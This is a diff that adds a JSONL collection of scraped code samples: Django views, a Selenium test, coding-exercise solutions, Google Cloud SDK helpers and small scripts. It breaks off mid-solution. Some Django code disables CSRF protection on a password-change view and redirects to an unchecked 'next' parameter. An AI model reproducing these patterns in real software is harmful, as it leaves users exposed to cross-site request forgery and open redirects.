diff --git "a/5917.jsonl" "b/5917.jsonl" new file mode 100644--- /dev/null +++ "b/5917.jsonl" @@ -0,0 +1,712 @@ +{"seq_id":"626715510","text":"# -*- coding:utf-8-*-\n\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom container.package.logger import logger\nfrom container.package.etcd_module import etcds\nfrom container.package.kube import kube_func,kube\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom Adeployment.core.model_func import save_db\nimport logging\nimport json\n\n\n# Create your views here.\ndef account_login(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n user = authenticate(username=username,password=password)\n if user:\n login(request,user)\n save_db.save_logs_to_db(\"User:%s Login system\" % request.user)\n return redirect(request.GET.get('next') or '/')\n\n return render(request, 'login.html', locals())\n\ndef account_logout(request,**kwargs):\n request.session.clear()\n logout(request)\n return redirect('/')\n\n@csrf_exempt\n@login_required\ndef change_password_obj(request):\n if request.method == 'GET':\n return redirect(\"/\")\n elif request.method == \"POST\":\n user = request.user\n pwd = request.POST.get('pwd')\n new_pwd = request.POST.get(\"new_pwd\")\n re_pwd = request.POST.get(\"re_pwd\")\n\n obj = authenticate(username=user,password=pwd)\n # obj = models.UserInfo.objects.filter(username=user, password=pwd).first()\n ret = {'status': True, 'error': None}\n\n if obj:\n if new_pwd == re_pwd:\n obj.set_password(new_pwd)\n obj.save()\n return HttpResponse(json.dumps(ret))\n else:\n ret['status'] = False\n ret['error'] = \"新密码不一致\"\n return HttpResponse(json.dumps(ret))\n else:\n ret['status'] = False\n ret['error'] = \"原密码错误\"\n # 登陆失败,页面显示错误信息\n return HttpResponse(json.dumps(ret))\n return redirect('/')\n\n\n@login_required\ndef index(request):\n save_db.save_logs_to_db(\"User:%s Access index.html\" % request.user)\n return render(request,'index.html')\n\n@login_required\ndef nodes(request):\n logger.logger_info(\"GET NODE LIST\",LOG_LEVEL=logging.INFO,log_type='Nodes')\n save_db.save_logs_to_db(\"User:%s Get node list\" % request.user)\n nodes = kube.get_node()\n return render(request,'nodes/nodes/nodes_list.html',locals())\n\n@login_required\ndef node_info(request,node_name,*args):\n save_db.save_logs_to_db(\"User:%s Get node %s info\" %(request.user,node_name))\n node_func = kube.read_node(node_name)\n return render(request,'nodes/nodes/nodes_info.html',locals())\n\n@login_required\n@csrf_exempt\ndef pod(request):\n namespace = request.GET.get('project')\n if namespace:\n if namespace == 'all_data':\n save_db.save_logs_to_db(\"User:%s Get all namespaces\" % request.user)\n pod_list = kube_func.all_pod_for_namespace()\n else:\n save_db.save_logs_to_db(\"User:%s Get namespaces:%s info\" %(request.user,namespace))\n pod_list = kube_func.pod_for_namespace(namespace=namespace)\n return HttpResponse(json.dumps(pod_list))\n else:\n save_db.save_logs_to_db(\"User:%s Get pod list\" % request.user)\n pods_list = kube_func.get_list_namespace()\n namespace_list = [name.metadata.name for name in pods_list.items]\n return render(request,'nodes/pods/pods_list.html',locals())\n\n\n@login_required\ndef etcd_list(request):\n save_db.save_logs_to_db(\"User:%s Get etcd list\" % request.user)\n leader = etcds.cluster_leader()\n save_db.save_logs_to_db(\"User:%s Get etcd leader list\" % request.user)\n check_port = etcds.check_etcd_port()\n return render(request,'nodes/clusters/etcd_list.html',locals())\n\n@login_required\n@csrf_exempt\ndef etcd_websocket(request):\n logger.logger_info('GET Etcd Info',LOG_LEVEL=logging.INFO,log_type='ETCD')\n save_db.save_logs_to_db(\"User:%s Use websocket get etcd info\" % request.user)\n if request.method == 'POST':\n leader = etcds.cluster_leader()\n check_port = etcds.check_etcd_port()\n save_db.save_logs_to_db(\"User:%s Use post request of get etcd info success\" % request.user)\n logger.logger_info('GET Success',LOG_LEVEL=logging.INFO,log_type='ETCD')\n return HttpResponse(json.dumps({'leader':leader,'port_status':check_port}))\n else:\n save_db.save_logs_to_db(\"User:%s Get etcd faild,Reason: Use get request\" % request.user)\n logger.logger_error('GET faild',LOG_LEVEL=logging.ERROR,log_type='ETCD')\n return HttpResponse(json.dumps({'error':'Access Error'}))\n\n\n@login_required\ndef pod_namespace(request):\n namespace = request.GET.get('project').split('=')[0]\n pods_list = kube.get_list_namespaced_pod(namespace)\n save_db.save_logs_to_db(\"User:%s Get list namespaced pod success\" % request.user)\n return render(request, 'nodes/pods/pods_list.html', locals())\n\n\n@login_required\ndef pod_info(request,namespace):\n print('pod_info')\n logger.logger_info(\"get pod info\",LOG_LEVEL=logging.INFO,log_type='pod_info')\n name = request.GET.get('pod_name')\n pods_info = kube_func.pod_info(name=name,namespace=namespace)\n save_db.save_logs_to_db(\"User:%s Get pod:%s info on namespaces:%s \" %(request.user,name,namespace))\n return render(request,'nodes/pods/pods_info.html',locals())\n\n@csrf_exempt\n@login_required\ndef namespace(request):\n logger.logger_info('user:%s access namespaces list' % request.user, LOG_LEVEL=logging.INFO, log_type=\"namespace\")\n if request.method == 'POST':\n name = request.GET.get('project')\n if name == 'all_project':\n namespace_info = kube_func.all_namespace_pod_role()\n else:\n namespace_info = kube_func.namespace_pod_role(namespace=name)\n return HttpResponse(json.dumps(namespace_info))\n elif request.method == 'GET':\n return render(request,'nodes/namespace/namespace_list.html',locals())\n\n@login_required\ndef namespace_info(request):\n namespace = request.GET.get('project').split('=')[0]\n ns_info = kube_func.get_namespace_role_binding(namespace=namespace)\n return render(request,'nodes/namespace/namespace_info.html',locals())\n\n@login_required\ndef namespace_role_info(request):\n logger.logger_info(\"user:%s access namespace role info\" %request.user,LOG_LEVEL=logging.INFO,log_type='namespace')\n role = request.GET.get('role').split('=')[0]\n\n\n\n\n@login_required\ndef access_roles(request):\n userList = request.GET.get('roles')\n if userList:\n if userList == 'all_user':\n userFunc = kube_func.get_role_auth()\n else:\n userFunc = kube_func.get_a_role_on_project(userList)\n return HttpResponse(json.dumps(userFunc))\n else:\n userFunc = kube_func.get_all_user_list()\n return render(request,'nodes/roles/roles_list.html',locals())\n\n@login_required\ndef role_info(request):\n role = request.GET.get('role')\n objects = kube_func.get_a_role_on_project(role)\n userInfo = kube_func.get_a_user_info(role)\n return render(request,'nodes/roles/roles_info.html',locals())\n\n","sub_path":"container/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"27701214","text":"# -*- coding: utf-8 -*-\r\nfrom selenium import webdriver\r\nfrom selenium. webdriver.common.action_chains import ActionChains\r\nfrom Login_out.Login import Login\r\nimport unittest,time, os\r\n\r\n\r\nclass Batch_Create_Offer(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.dr = webdriver.Chrome()\r\n self.dr.get(\"http://aflt-frontend-pre-1017451597.us-west-1.elb.amazonaws.com/login\")\r\n Login().user_login(self.dr)\r\n time.sleep(5)\r\n\r\n def test_create(self):\r\n dr = self.dr\r\n # 进入Batch Create Offer页面\r\n ele_0 = dr.find_element_by_css_selector(\"nav > ul > li:nth-child(2)\")\r\n ActionChains(dr).move_to_element(ele_0).perform()\r\n dr.find_element_by_css_selector(\" li.open > ul > li:nth-child(6)\").click()\r\n # 点击select excel\r\n dr.find_element_by_id(\"file_upload\").click()\r\n # 调用upfile.exe上传程序\r\n os.system(\"D:\\\\Autoit\\\\upfile.exe\")\r\n time.sleep(2)\r\n dr.find_element_by_css_selector(\"button[type='button']\").click()\r\n\r\n\r\n\r\n def tearDown(self):\r\n self.dr.quit()\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"Batch_Create_Offer.py","file_name":"Batch_Create_Offer.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"166004093","text":"'''\nhttps://www.hackerrank.com/challenges/larrys-array\n3\n3\n3 1 2\n4\n1 3 4 2\n5\n1 2 3 5 4\n'''\nT = int(raw_input())\nfor _ in range(T):\n n = int(raw_input())\n nums = map(int, raw_input().strip().split(' '))\n sign = 1\n for x in xrange(0,n):\n for y in xrange(x+1, n):\n if(nums[x] > nums[y]):\n sign *= -1\n if(sign == 1): print(\"YES\")\n else: print(\"NO\") ","sub_path":"algorithms/larrysArray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"432084274","text":"num1 = float(input(\"Please enter a number\"))\nnum2 = float(input(\"Please enter a different number\"))\nbigger = 0.0\nsmaller = 0.0\nif (num1 == num2):\n print(\"Please enter two different numbers\")\n\nelse:\n if (num1>num2):\n bigger = num1\n smaller = num2\n print(\"bigger = %.2f\" %bigger, \", smaller = %.2f\" %smaller)\n else:\n bigger = num2\n smaller = num1\n print(\"bigger = %.2f\" %bigger, \", smaller = %.2f\" %smaller)\n","sub_path":"Week4/A/Week4_Branch06.py","file_name":"Week4_Branch06.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"512264388","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect, reverse, redirect\r\nfrom django.views.generic import View\r\nfrom django.db.models import Q\r\n\r\nfrom pure_pagination import Paginator, PageNotAnInteger\r\n\r\nfrom models import Article, Tag, Category\r\nfrom forms import ArticleForm\r\n\r\n# Create your views here.\r\n\r\n\r\nclass ArticleListView(View):\r\n def get(self, request):\r\n\r\n sort = request.GET.get(\"sort\", \"\")\r\n\r\n if sort == 'date':\r\n order_filed = \"-date_published\"\r\n else:\r\n order_filed = \"title\"\r\n\r\n search_keywords = request.GET.get(\"keywords\", \"\")\r\n\r\n all_articles = Article.objects.all()\r\n\r\n if search_keywords:\r\n all_articles = all_articles.filter(Q(title__contains=search_keywords)|Q(desc__contains=search_keywords))\r\n\r\n choose_sort = all_articles.order_by(order_filed)\r\n\r\n try:\r\n page = request.GET.get(\"page\", 1)\r\n except PageNotAnInteger:\r\n page = 1\r\n\r\n p = Paginator(choose_sort, 5, request=request)\r\n\r\n article = p.page(page)\r\n\r\n if not request.user.is_authenticated():\r\n username = 'Visitor'\r\n else:\r\n username = request.user.username\r\n\r\n return render(request, \"index.html\", {\r\n \"all_article\": article,\r\n \"sort\": sort,\r\n \"username\": username\r\n })\r\n\r\n\r\nclass ArticleDetailView(View):\r\n def get(self, request, article_id):\r\n article = Article.objects.get(id=int(article_id))\r\n article.click_count += 1\r\n article.save()\r\n\r\n previous_article = Article.objects.raw('SELECT * FROM articles_article WHERE id < %s OR ID=(SELECT MIN(ID) FROM articles_article) ORDER BY id DESC LIMIT 1' % int(article_id))[0]\r\n if previous_article.id == int(article_id):\r\n previous_article = article\r\n\r\n next_article = Article.objects.raw('SELECT * FROM articles_article WHERE id > %s OR ID=(SELECT MAX(ID) FROM articles_article) ORDER BY id ASC LIMIT 1' % int(article_id))[0]\r\n if next_article.id == int(article_id):\r\n next_article = article\r\n\r\n return render(request, 'detail.html', {\r\n 'article': article,\r\n 'previous_article': previous_article,\r\n 'next_article': next_article\r\n })\r\n\r\n\r\nclass ArticleCreateView(View):\r\n def get(self, request):\r\n article_category = Category.objects.all()\r\n article_tag = Tag.objects.all()\r\n return render(request, 'create.html', {\r\n 'article_category': article_category,\r\n 'article_tag': article_tag,\r\n })\r\n\r\n def post(self, request):\r\n obj = ArticleForm(request.POST)\r\n current_user = request.user\r\n print(current_user)\r\n if obj.is_valid():\r\n instance = obj.save(commit=False)\r\n instance.user_id = current_user.id\r\n instance.save()\r\n obj.save_m2m()\r\n\r\n return HttpResponse('{\"status\": \"success\", \"msg\": \"%s\"}' % instance.id, content_type='application/json')\r\n else:\r\n return HttpResponse('{\"status\": \"fail\", \"msg\": \"保存出错\"}', content_type='application/json')\r\n\r\n\r\n\r\n\r\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"294855487","text":"\"\"\"\n\"\"\"\nimport os\nfrom astropy.table import Table\n\n\nNERSC_DRN = \"/global/cfs/cdirs/desi/users/gbeltzmo/C3EMC/UNIT\"\n\n\ndef read_diffsky_mock(fn=None, drn=NERSC_DRN):\n \"\"\"Read the diffsky mock from disk.\n\n Parameters\n ----------\n fn : string\n Mock file name\n\n \"\"\"\n if fn is None:\n raise ValueError(\"No filename given\")\n\n f = os.path.join(drn, fn)\n\n return Table.read(f, path=\"data\")\n","sub_path":"c3dev/galmocks/data_loaders/load_diffsky_mock.py","file_name":"load_diffsky_mock.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"20098654","text":"import json\nimport pprint\nfrom collections import defaultdict\nfrom itertools import chain\nimport numpy as np\n\nfrom ThesisData.data_constants import SAVE_NAME\n\nload_file = SAVE_NAME % (\"linear_data\", \"json\")\nsave_file = SAVE_NAME % (\"linear_data_agg\", \"json\")\n\nwith open(load_file, \"r\") as f:\n data = json.load(f)\n\ndef flatten_dicts(dicts):\n dicts = map(lambda x: x.items(), dicts)\n result = defaultdict(list)\n \n for k, v in chain(*dicts):\n result[k].append(v)\n \n return result\n\ndef average_flat_dicts(dicts):\n flat = flatten_dicts(dicts)\n result = {}\n \n for k, v in flat.items():\n mean = np.array(v).mean(axis=0)\n\n if (type(mean) == np.ndarray):\n mean = list(mean)\n\n result[k] = mean\n \n return result\n\ndef average_dicts(dicts):\n length = len(dicts)\n dicts = map(lambda x: x.items(), dicts)\n result = defaultdict(int)\n \n for k, v in chain(*dicts):\n result[k] += v\n \n for k in result.keys():\n result[k] /= length\n \n return result\n\nlists = []\norder = []\nfor n_actors in data.keys():\n for n_txs in data[n_actors].keys():\n order.append((n_actors, n_txs))\n lists.append(data[n_actors][n_txs].values())\n\nfirst = next(iter(lists[0]))\ntypes = list(first.keys())\nvalue_names = list(first[types[0]].keys())\n\naggregated_list = []\nfor lst in lists:\n aggregated = defaultdict(lambda: defaultdict(list))\n\n for dct in lst:\n for t in types:\n for name in value_names:\n aggregated[t][name].append(dct[t][name])\n \n aggregated_list.append(aggregated)\n \nfor aggregated in aggregated_list:\n cuts = []\n \n for t in types:\n cuts.append(aggregated[t][\"was_cut\"])\n \n cuts = np.array(cuts).sum(axis=0)==0\n \n for t in types:\n current = aggregated[t]\n current[\"result\"] = average_dicts(\n np.array(current[\"result\"])[cuts])\n current[\"resources\"] = average_flat_dicts(\n np.array(current[\"resources\"])[cuts])\n current[\"was_cut\"] = sum(current[\"was_cut\"]) / len(current[\"was_cut\"])\n \n s_txs = current[\"result\"][\"start_n_txs\"]\n cost = current[\"result\"][\"result_cost\"]\n\n current[\"result\"][\"reduction\"] = (s_txs - cost) / s_txs \n\ni = 0\n\nresult = defaultdict(dict)\nfor n_actors, n_txs in order:\n result[n_actors][n_txs] = aggregated_list[i]\n i += 1\n\nwith open(save_file, \"w\") as f:\n json.dump(result, f, indent=4, sort_keys=True)","sub_path":"ThesisData/transform_data/linear_data_aggregate.py","file_name":"linear_data_aggregate.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"599403751","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utility for interacting with Artifact Registry requests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom googlecloudsdk.api_lib import artifacts\nfrom googlecloudsdk.api_lib.artifacts import exceptions as ar_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\n\n_INVALID_REPO_NAME_ERROR = (\n \"Names may only contain lowercase letters, numbers, and hyphens, and must \"\n \"begin with a letter and end with a letter or number.\")\n\n_VALID_LOCATIONS = [\n \"northamerica-northeast1\",\n \"us-central1\",\n \"us-east1\",\n \"us-east4\",\n \"us-west1\",\n \"us-west2\",\n \"southamerica-east1\",\n \"europe-north1\",\n \"europe-west1\",\n \"europe-west2\",\n \"europe-west3\",\n \"europe-west4\",\n \"europe-west6\",\n \"asia-east1\",\n \"asia-east2\",\n \"asia-northeast1\",\n \"asia-northeast2\",\n \"asia-south1\",\n \"asia-southeast1\",\n \"australia-southeast1\",\n \"asia\",\n \"europe\",\n \"us\",\n]\n\n_REPO_REGEX = \"^[a-z]([a-z0-9-]*[a-z0-9])?$\"\n\n\ndef _GetMessagesForResource(resource_ref):\n return artifacts.Messages(resource_ref.GetCollectionInfo().api_version)\n\n\ndef _GetClientForResource(resource_ref):\n return artifacts.Client(resource_ref.GetCollectionInfo().api_version)\n\n\ndef _IsValidLocation(location):\n return location.lower() in _VALID_LOCATIONS\n\n\ndef _IsValidRepoName(repo_name):\n return re.match(_REPO_REGEX, repo_name) is not None\n\n\ndef GetProject(args):\n \"\"\"Gets project resource from either argument flag or attribute.\"\"\"\n return args.project or properties.VALUES.core.project.GetOrFail()\n\n\ndef GetRepo(args):\n \"\"\"Gets repository resource from either argument flag or attribute.\"\"\"\n return args.repository or properties.VALUES.artifacts.repository.GetOrFail()\n\n\ndef GetLocation(args):\n \"\"\"Gets location resource from either argument flag or attribute.\"\"\"\n return args.location or properties.VALUES.artifacts.location.GetOrFail()\n\n\ndef GetLocationList():\n \"\"\"Gets a list of all supported locations.\"\"\"\n return _VALID_LOCATIONS\n\n\ndef AppendRepoDataToRequest(repo_ref, repo_args, request):\n \"\"\"Adds repository data to CreateRepositoryRequest.\"\"\"\n if not _IsValidRepoName(repo_ref.repositoriesId):\n raise ar_exceptions.InvalidInputValueError(_INVALID_REPO_NAME_ERROR)\n if not _IsValidLocation(repo_args.location):\n raise ar_exceptions.UnsupportedLocationError(\n \"{} is not a valid location. Valid locations are [{}].\".format(\n repo_args.location, \", \".join(_VALID_LOCATIONS)))\n messages = _GetMessagesForResource(repo_ref)\n repo = messages.Repository(\n name=repo_ref.RelativeName(),\n description=repo_args.description,\n format=messages.Repository.FormatValueValuesEnum(\n repo_args.repository_format.upper()))\n request.repository = repo\n request.repositoryId = repo_ref.repositoriesId\n return request\n\n\ndef DeleteVersionTags(ver_ref, ver_args, request):\n \"\"\"Deletes tags associate with the specified version.\"\"\"\n if not ver_args.delete_tags:\n return request\n client = _GetClientForResource(ver_ref)\n messages = _GetMessagesForResource(ver_ref)\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=ver_ref.Parent().RelativeName())\n list_tags_res = client.projects_locations_repositories_packages_tags.List(\n list_tags_req)\n for tag in list_tags_res.tags:\n if tag.version != ver_ref.RelativeName():\n continue\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag.name)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag.name, err))\n return request\n\n\ndef DeletePackageTags(pkg_ref, pkg_args, request):\n \"\"\"Deletes tags associate with the specified package.\"\"\"\n if not pkg_args.delete_tags:\n return request\n client = _GetClientForResource(pkg_ref)\n messages = _GetMessagesForResource(pkg_ref)\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=pkg_ref.RelativeName())\n list_tags_res = client.projects_locations_repositories_packages_tags.List(\n list_tags_req)\n for tag in list_tags_res.tags:\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag.name)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag.name, err))\n return request\n\n\ndef AppendTagDataToRequest(tag_ref, tag_args, request):\n \"\"\"Adds tag data to CreateTagRequest.\"\"\"\n parts = request.parent.split(\"/\")\n pkg_path = \"/\".join(parts[:len(parts) - 2])\n request.parent = pkg_path\n messages = _GetMessagesForResource(tag_ref)\n tag = messages.Tag(\n name=tag_ref.RelativeName(),\n version=pkg_path + \"/versions/\" + tag_args.version)\n request.tag = tag\n request.tagId = tag_ref.tagsId\n return request\n\n\ndef SetTagUpdateMask(tag_ref, tag_args, request):\n \"\"\"Set update mask to UpdateTagRequest.\"\"\"\n messages = _GetMessagesForResource(tag_ref)\n parts = request.name.split(\"/\")\n pkg_path = \"/\".join(parts[:len(parts) - 2])\n tag = messages.Tag(\n name=tag_ref.RelativeName(),\n version=pkg_path + \"/versions/\" + tag_args.version)\n request.tag = tag\n request.updateMask = \"version\"\n return request\n\n\ndef SlashEscapePackageName(pkg_ref, unused_args, request):\n \"\"\"Escapes slashes in package name for ListVersionsRequest.\"\"\"\n request.parent = \"{}/packages/{}\".format(\n pkg_ref.Parent().RelativeName(), pkg_ref.packagesId.replace(\"/\", \"%2F\"))\n return request\n\n\ndef SlashUnescapePackageName(response, unused_args):\n \"\"\"Unescape slashes in package name from ListPackagesResponse.\"\"\"\n ret = []\n for ver in response:\n ver.name = os.path.basename(ver.name)\n ver.name = ver.name.replace(\"%2F\", \"/\").replace(\"%2f\", \"/\")\n ret.append(ver)\n return ret\n\n\ndef AppendParentInfoToListReposResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListRepositoriesRequest.\"\"\"\n if response:\n log.status.Print(\"Listing items under project {}, location {}.\\n\".format(\n GetProject(args), GetLocation(args)))\n return response\n\n\ndef AppendParentInfoToListPackagesResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListPackagesRequest.\"\"\"\n if response:\n log.status.Print(\n \"Listing items under project {}, location {}, repository {}.\\n\".format(\n GetProject(args), GetLocation(args), GetRepo(args)))\n return response\n\n\ndef AppendParentInfoToListVersionsAndTagsResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListVersions or ListTags.\"\"\"\n if response:\n log.status.Print(\n \"Listing items under project {}, location {}, repository {}, \"\n \"package {}.\\n\".format(\n GetProject(args), GetLocation(args), GetRepo(args), args.package))\n return response\n","sub_path":"exec -l /bin/zsh/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/artifacts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"493419186","text":"from django.shortcuts import render, get_object_or_404\nfrom parceiro.forms import ParceiroForm\nfrom endereco.forms import EnderecoForm\nfrom parceiro.models import Parceiro\n\ntemplate_novo = 'parceiro/novo.html'\ntemplate_detalhe = 'parceiro/detalhe.html'\n\ndef novo(request):\n dados = {}\n dados['form'] = ParceiroForm()\n dados['formEndereco'] = EnderecoForm()\n return render(request, template_novo, dados)\n\ndef salvar(request, id=None):\n dados = {}\n\n form = ParceiroForm(request.POST or None)\n formEndereco = EnderecoForm(request.POST or None)\n\n if form.is_valid() and formEndereco.is_valid():\n parceiro = form.save(commit=False)\n\n if id not in (None, '0'):\n parceiro.id = id\n\n parceiro.endereco = formEndereco.save()\n\n parceiro.save()\n mensagem = 'Parceiro salvo com sucesso!'\n return detalhe(request, parceiro.id, mensagem)\n\n\ndef detalhe(request, id, mensagem=None):\n\tdados = {}\n\tdados['mensagem'] = mensagem\n\tparceiro = get_object_or_404(Parceiro, id=id)\n\tform = ParceiroForm(instance=parceiro)\n\tdados['form'] = form\n\tdados['formEndereco'] = EnderecoForm(instance=parceiro.endereco)\n\tdados['parceiro'] = parceiro\n\treturn render(request, template_detalhe, dados)","sub_path":"parceiro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"29090531","text":"\"\"\"\r\nA program to demonstrate all concepts covered in the Python fundamentals crash course\r\n\r\nProblem 1 in Chapter 10 of Py4E - https://www.py4e.com/html3/10-tuples\r\n\"Exercise 1: Revise a previous program as follows: Read and parse the “From” lines\r\nand pull out the addresses from the line. Count the number of messages\r\nfrom each person using a dictionary. After all the data has been read,\r\nprint the person with the most commits by creating a list of (count, email)\r\ntuples from the dictionary. Then sort the list in reverse order\r\nand print out the person who has the most commits.\"\r\n\r\ncontext: you can use mbox-short.txt as input.\r\n\r\nApproach: This file has lines starting with: \"From\" followed by a space, an email id and so on.\r\nThese are the lines we want and rest of the lines are not needed for this program\r\n\"\"\"\r\n\r\nfrom_counts = {} #an empty dictionary object to store pairs.\r\n\"\"\" a dictionary because I want to store an email id (key) and the number of times \r\nit appeared in the From: field in the text\"\"\"\r\n\r\n# Let us start by reading the file line by line:\r\nfh = open(\"files/mbox-short.txt\") #open a file handler\r\n\r\nfor line in fh: #read the file line by line\r\n # We have to now see if the line is starting with \"From\"\r\n if line.startswith(\"From:\"): #use the\r\n # All lines that start with a From are not necessarily in the format we want.\r\n try: #what if there is no space at all in this line? the line below will throw an error\r\n temp = line.split(\" \") #.split() method splits a string into pieces and returns a list.\r\n\r\n #You can print the variable temp here if you want to see what it looks like.\r\n\r\n if temp[0] == \"From\" and \"@\" in temp[1]: #conditional and boolean expressions.\r\n \"\"\"\r\n At the beginning, I initiated an empty dictionary object to store the email id and the \r\n number of times it was in the \"From\" field. Here, we start populating that dictionary,\r\n each time we see a line starting with From and has an @ symbol -which I use as a proxy\r\n to identify the email. The following line looks for temp[1] i.e., an email id\r\n in from_counts dictionary. If it finds it, it adds one to the number of times it appeared\r\n so far in the text. Else, it assigns that email as a new key, and starts the counter at 1. \r\n \"\"\"\r\n from_counts[temp[1]] = from_counts.get(temp[1],0)+1\r\n except:\r\n print(\"This line starts with a From, but does not have the format we want\")\r\n\r\nfh.close() #close the file handler.\r\n\r\nprint(from_counts) #See what is in the dictionary.\r\n\r\n#convert the dictionary into a list of tuples\r\nfrom_counts_new = []\r\nfor key in from_counts.keys():\r\n from_counts_new.append((from_counts[key],key))\r\n\r\n\"\"\"the above three lines can be condensed to a single line below. \r\nThis is called \"List comprehension\" in Python. \"\"\"\r\n#from_counts_new = [(v,k) for k,v in from_counts.items()]\r\n\r\n#from_counts_new contains a list of (count, email) tuples.\r\nfrom_counts_new.sort(reverse=True)\r\n\r\n#from_counts_new now contains (count, email) tuples, sorted in descending order of count.\r\n#Remember: .sort() changes the list contents itself, and does not create a new list.\r\n#print(from_counts_new) #See the sorted list\r\n\r\nprint(from_counts_new[1]) #see the one with most sent emails\r\n\r\n\"\"\"\r\nNote: I wrote the code this way to make use of all data structures we discussed and put in conditionals, loops\r\nexception handling, files- everything in place. There are optimal ways of writing the code. You can try yourselves!\r\n\r\nThe only things I did not use here are functions and main function. Try to add those too into this program!\r\n\"\"\"\r\n","sub_path":"code/Everything.py","file_name":"Everything.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"577326008","text":"\"\"\"\nWrite a function that asks for an integer and prints \nthe square of it. Use a while loop with a try, except, \nelse block to account for incorrect inputs.\n\n# EXAMPLE OUTPUT\n\nInput an integer: null\nAn error occured! Please try again!\nInput an integer: 2\nThank you, your number squared is: 4\n\"\"\"\n\n#######################\n## SOLUTION BY KEVIN ##\n#######################\n\ndef ask():\n\n\tasking = True\n\n\twhile asking:\n\t\ttry:\n\t\t\tnum = int(input('Input an integer: '))\n\t\texcept:\n\t\t\tprint('An error occured! Please try again!')\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(f'Thank you, your number squared is: {num**2}')\n\t\t\tasking = False\n\nprint(ask())","sub_path":"ERRORS_AND_EXCEPTIONS_HOMEWORK/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"297941551","text":"\nfrom time import time\n\ndef assign(n,size):\n c = []\n for i in range(size):\n x = []\n for j in range(size):\n x.append(int(n))\n c.append(x)\n return c\n\ndef mul(a,b):\n #c = [[0]*len(a)]*len(a)\n c = assign(0,len(a))\n\n for i in range(len(a)):\n for j in range(len(a)):\n for k in range(len(a)):\n c[i][j] += a[i][k]*b[k][j]\n return c\n\n\na = assign(1,100)\nt1 = time()\nc = mul(a,a)\nt2 = time()\nprint(c)\nprint(\"Time taken is\",t2-t1)\n","sub_path":"matrix multiplication.py","file_name":"matrix multiplication.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"344680427","text":"# reference https://leetcode.com/problems/binary-tree-maximum-path-sum/discuss/39919/8-10-lines-two-solutions\nfrom typing import List\n\n# Definition for a binary tree node.\n# The number of nodes in the tree is in the range [1, 3 * 104].\n# So it is null empty tree\nclass TreeNode:\n \n \n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n#recursion\n#runtime O(n^2)\nclass Solution1:\n def maxPathSum(self, root: TreeNode) -> int:\n def maxPathFromRoot(root: TreeNode) ->int:\n if root.left:\n resL = maxPathFromRoot(root.left)\n if root.right:\n resR = maxPathFromRoot(root.right)\n res = 